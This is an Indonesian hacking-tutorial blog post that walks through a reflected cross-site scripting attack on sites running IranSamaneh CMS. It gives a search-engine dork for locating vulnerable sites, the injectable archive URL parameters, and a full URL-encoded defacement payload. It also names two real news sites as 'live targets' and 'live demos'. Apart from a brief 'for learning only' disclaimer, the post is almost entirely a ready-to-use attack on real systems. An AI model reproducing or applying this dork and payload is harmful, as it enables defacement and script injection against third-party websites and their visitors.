IranSamaneh CMS Cross Site Scripting [ XSS ] - Ryangueltoem

Ryangueltoem

Kumpulan Berbagai TUTORIAL yang ada di Internet.

Breaking

Post Top Ad

All Tutor Cyber

Monday, April 10, 2017

IranSamaneh CMS Cross Site Scripting [ XSS ]


IranSamaneh CMS Cross Site Scripting [ XSS ]

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan IranSamaneh CMS Cross Site Scripting [ XSS ]

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini

Bahan :

Dork : - intext:"طراحی Ùˆ تولید: " ایران سامانه " " intitle:آرشیو

Exploit : fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20&from_date=1392/07/06&to_date=1396/01/16&p=2

XSS Script : Disini

Step By Step :

1. Dorking Dulu Ke Gugle : intext:"طراحی Ùˆ تولید: " ایران سامانه " " intitle:آرشیو


2. Pilih Salah Satu Web
    Live Target : http://www.fardanews.com/

3. Masukkan Exploit fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20&from_date=1392/07/06&to_date=1396/01/16&p=2
Jadinya Begini : http://www.fardanews.com/fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20&from_date=1392/07/06&to_date=1396/01/16&p=2

4. Tinggal masukkan Xss Script pada from_data= atau to_data=
    Contoh : http://www.fardanews.com/fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20&from_date=1392/07/06&to_date=Touched%20By%20GU3LT03M%3C%2Ftitle%3E%3Cbody+bgcolor%3D%22black%22%3E%3Ccenter%3E%3Cmarquee%3E%3Cb%3E%3Cfont+color%3D%22lime%22%3E%3Ch1%3EFamily%20Attack%20Cyber%20Wash%20Here%3C%2Fh1%3E%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fmarquee%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cb%3E%3Cfont+color%3D%22red%22%3ETouched%20By%20GU3LT03M%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fcenter%3E%3Cnoscript%3E%3C!--%27))%2C%40)%3Cmarquee%3EK%3C%2Fmarquee%3E&p=2

5. Jika Vuln Akan Muncul XSS Script Kamu



Live Demo :

http://www.tabnak.ir/fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20&from_date=Touched%20By%20GU3LT03M%3C%2Ftitle%3E%3Cbody+bgcolor%3D%22black%22%3E%3Ccenter%3E%3Cmarquee%3E%3Cb%3E%3Cfont+color%3D%22lime%22%3E%3Ch1%3EFamily%20Attack%20Cyber%3C%2Fh1%3E%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fmarquee%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cb%3E%3Cfont+color%3D%22red%22%3ETouched%20By%20GU3LT03M%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fcenter%3E%3Cnoscript%3E%3C!--%27))%2C%40)%3Cmarquee%3EK%3C%2Fmarquee%3E&p=2

http://www.fardanews.com/fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20&from_date=1392/07/06&to_date=Touched%20By%20GU3LT03M%3C%2Ftitle%3E%3Cbody+bgcolor%3D%22black%22%3E%3Ccenter%3E%3Cmarquee%3E%3Cb%3E%3Cfont+color%3D%22lime%22%3E%3Ch1%3EFamily%20Attack%20Cyber%20Wash%20Here%3C%2Fh1%3E%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fmarquee%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cb%3E%3Cfont+color%3D%22red%22%3ETouched%20By%20GU3LT03M%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fcenter%3E%3Cnoscript%3E%3C!--%27))%2C%40)%3Cmarquee%3EK%3C%2Fmarquee%3E&p=2


Metode ini Masih Baru Jadi Use Your Brain Masukkin Exploitnya ^_^

&

Metode ini Juga Fake Mirror ^_^

Sekianlah Postingan Dari All Tutor Cyber tentang "IranSamaneh CMS Cross Site Scripting [ XSS ]" Semoga Bisa Bermanfaat!.

Anda Sekarang Sedang Membaca Postingan "IranSamaneh CMS Cross Site Scripting [ XSS ]" Dengan URL https://ryangueltoem.blogspot.co.id/2017/04/iransamaneh-cms-cross-site-scripting-xss.html
Jika Ada Content Yang Berbau Pantest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber

No comments:

Post a Comment